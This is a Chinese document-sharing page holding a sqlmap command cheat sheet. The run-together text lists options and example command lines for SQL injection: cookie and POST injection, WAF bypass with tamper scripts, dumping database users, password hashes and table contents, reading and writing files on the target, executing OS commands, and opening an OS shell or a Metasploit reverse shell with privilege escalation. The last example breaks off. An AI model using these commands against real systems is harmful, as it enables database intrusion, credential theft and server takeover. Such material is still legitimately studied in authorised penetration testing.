您好,欢迎访问三七文档
当前位置:首页 > 商业/管理/HR > 公司方案 > sqlmap命令详解
cookie注入:sqlmap.py-u注入点--cookie参数--tables--level2POST登录框注入:sqlmap.py-r从文件读取数据-p指定的参数--tablessqlmap.py-u登录的地址--forms自动判断注入sqlmap.py-u登录的地址--data指定参数绕过waf防火墙:sqlmap.py-u注入点-v3--dbs--batch--tamperspace2morehash.py,space2hash.py,base64encode.py,charencode.py-u#注入点-g谷歌搜索-f#指纹判别数据库类型-b#获取数据库版本信息-p#指定可测试的参数(?page=1&id=2-p“page,id”)-D“”#指定数据库名-T“”#指定表名-C“”#指定字段-s“”#保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s“xx.log”恢复:-s“xx.log”–resume)–columns#列出字段–current-user#获取当前用户名称–current-db#获取当前数据库名称–users#列数据库所有用户–passwords#数据库用户所有密码–privileges#查看用户权限(–privileges-Uroot)-U#指定数据库用户–dbs#列出所有数据库–tables-D“”#列出指定数据库中的表–columns-T“user”-D“mysql”#列出mysql数据库中的user表的所有字段–dump-all#列出所有数据库所有表–exclude-sysdbs#只列出用户自己新建的数据库和表–dump-T“”-D“”-C“”#列出指定数据库的表的字段的数据(–dump-Tusers-Dmaster-Csurname)–dump-T“”-D“”–start2–top4#列出指定数据库的表的2-4字段的数据–dbms#指定数据库(MySQL,Oracle,PostgreSQL,MicrosoftSQLServer,MicrosoftAccess,SQLite,Firebird,Sybase,SAPMaxDB)–os#指定系统(Linux,Windows)--sql-shell写shell--delay延迟的时间--safe-freq次数-v#详细的等级(0-6)0:只显示Python的回溯,错误和关键消息。1:显示信息和警告消息。2:显示调试消息。3:有效载荷注入。4:显示HTTP请求。5:显示HTTP响应头。6:显示HTTP响应页面的内容–privileges#查看权限–is-dba#是否是数据库管理员–roles#枚举数据库用户角色–udf-inject#导入用户自定义函数(获取系统权限)–union-check#是否支持union注入–union-cols#union查询表记录–union-test#union语句测试–union-use#采用union注入–union-techorderby#union配合orderby–method“POST”–data“”#POST方式提交数据(–method“POST”–data“page=1&id=2″)–cookie“用;号分开”#cookie注入(–cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52;security=low”)–referer“”#使用referer欺骗(–referer“”)–user-agent“”#自定义user-agent–proxy“″#代理注入–string“”#指定关键词–threads#采用多线程(–threads3)–sql-shell#执行指定sql命令–sql-query#执行指定的sql语句(–sql-query“SELECTpasswordFROMmysql.userWHEREuser=‘root’LIMIT0,1″)–file-read#读取指定文件–file-write#写入本地文件(–file-write/test/test.txt–file-dest/var/将本地的test.txt文件写入到目标的1.txt)–file-dest#要写入的文件绝对路径–os-cmd=id#执行系统命令–os-shell#系统交互shell–os-pwn#反弹shell(–os-pwn–msf-path=/opt/framework/msf3/)–msf-path=#matesploit绝对路径(–msf-path=/opt/framework/msf3/)–os-smbrelay#–os-bof#–reg-read#读取win系统注册表–priv-esc#–time-sec=#延迟设置默认–time-sec=5为5秒-p“user-agent”–user-agent“sqlmap/0.7rc1()”#指定user-agent注入–eta#盲注/pentest/database/sqlmap/txt/common-columns.txt字段字典common-outputs.txtcommon-tables.txt表字典keywords.txtoracle-default-passwords.txtuser-agents.txtwordlist.txt1)判断当前用户是否是dbapythonsqlmap.py-uurl--is-dba-v12)--users:列出数据库管理系统用户pythonsqlmap.py-uurl--users-v03)--passwords:数据库用户密码(hash)pythonsqlmap.py-uurl--passwords-v0pythonsqlmap.py-uurl--passwords-Usa-v04)查看用户权限pythonsqlmap.py-uurl--privileges-v0pythonsqlmap.py-uurl--privileges-Upostgres-v05)--dbs可以利用的数据库pythonsqlmap.py-uurl--dbs-v06)--tables列数据库表pythonsqlmap.py-uurl--tables-Dinformation_scheam-D:指定数据名称7)--columns列出表中的列名pythonsqlmap.py-uurl--columns-Tuser-Dmysql-v1-T:指定表名,-D:指定库名8)--dump列表中指定列的内容pythonsqlmap.py-uurl--dump-Tusers-Dtestdb-C:可以指定字段指定列的范围为2到4pythonsqlmap.py-uurl--dump-Tusers-Dtestdb--start2--stop4-v09)--dumap-all列出所有数据库,所有表内容pythonsqlmap.py-uurl--dump-all-v0只列出用户自己新建的数据库和表的内容pythonsqlmap.py-uurl--dump-all--exclude-sysdbs-v010)--file读取文件内容[load_file()函数]pythonsqlmap.py-uurl--file/etc/password11)执行SQLpythonsqlmap.py-uurl--sql-shell12)-p指定参数pythonsqlmap.py-uurl-v1-pid-p可以指定多参数-pcat,id13)POST提交pythonsqlmap.py-uurl--methodPOST--dataid=114)COOKIE提交pythonsqlmap.py-uurl--cookieid=1-v1cookie值可以由TamperData抓取15)refer欺骗pythonsqlmap.py-uurl--referurl-v316)使用自定义user-agent或者user-agents.txtpythonsqlmap.py-uurl--user-agentMozilla/4.0(compatible;MSIE7.0;WindowsNT5.1)-v3pythonsqlmap.py-uurl-v1-a./txt/user-agents.txt17)使用多线程猜解pythonsqlmap.py-uurl-v1--current-user--threads318)指定数据库,绕过SQLMAP的自动检测pythonsqlmap.py-uurl-v2--dbmsPostgreSQL19)指定操作系统绕过SQLMAP自动检测pythonsqlmap.py-uurl-v2--osWindows20)--prefixand--postfix自定义payloadpythonsqlmap.py-uurl-v3-pid--prefix'--postfixand'test'='test21)union注入测试pythonsqlmap.py-uurl--union-test-v-122)配合orderbypythonsqlmap.py-uurl--union-test--union-techorderby-v123)pythonsqlmap.py-uurl-v1--union-use--banner24)pythonsqlmap.py-uurl-v5--union-use--current-user25)pythonsqlmap.py-uurl-v1--union-use--dbs常用语句1../sqlmap.py-u=2-f-b–current-user–current-db–users–passwords–dbs-v02../sqlmap.py-u=2-b–passwords-Uroot–union-use-v23../sqlmap.py-u=2-b–dump-Tusers-Cusername-Duserdb–start2–stop3-v24../sqlmap.py-u=2-b–dump-C“user,pass”-v1–exclude-sysdbs5../sqlmap.py-u=2-b–sql-shell-v26../sqlmap.py-u=2-b–file-read“c:\boot.ini”-v27../sqlmap.py-u=2-b–file-write/test/test.txt–file-dest/var/://=2-b–os-cmd“id”-v19../sqlmap.py-u=2-b–os-shell–union-use-v210../sqlmap.py-u=2-b–os-pwn–msf-path=/opt/framework/msf3–priv-esc-v111../sqlmap.py-u=2-b–os-pwn–msf-path=/opt/framework/msf3-v112../sqlmap.py-uhttp
本文标题:sqlmap命令详解
链接地址:https://www.777doc.com/doc-1740209 .html